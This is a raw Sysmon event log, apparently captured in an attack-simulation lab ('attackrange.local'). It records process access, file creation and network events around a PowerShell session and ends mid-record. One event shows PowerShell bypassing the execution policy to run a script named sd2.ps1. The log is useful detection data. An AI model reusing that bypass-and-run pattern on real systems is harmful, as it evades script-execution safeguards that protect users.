08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}7440ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf72ca45.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.851{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.803{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.803{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.733{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.733{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.733{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.718{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.718{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001052695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.649{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001052694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.649{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=7DF9D06FA3FF100C721D8101DF107116,SHA256=3B641FA376C4B9B9DD98A53E830FD4E11195277FBE6DE1AD5D8F765675C958B5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.618{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 23542300x80000000000000001052692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.603{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnkMD5=2BBF0EF7F12C0E0D4CE01903A24DF320,SHA256=DB1923770FFF300815D58749BD354D98CC829CF19652746891F8244AE1DC4739,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.603{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.603{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.587{466BC892-F71D-60EB-BA7D-00000000CF01}94728012C:\Windows\system32\conhost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.565{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.550{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.550{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.550{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001052681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.532{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 
'C:\Temp\test\sd2.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.402{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CFED4E0CC8AB51FBACE02C4663B02C9,SHA256=94354E8F361453DF0B4B5950BF1F9AE6102CF78F04B241711A0EF2AC76D26CAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:37.267{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=168E9786B939FDE49D523E4CFB425D4D,SHA256=68BA6813F9E07682F524A82E7CE78FC3833879472FA6DC22D2E37A93978EE877,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:37.243{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57397-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:38.267{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
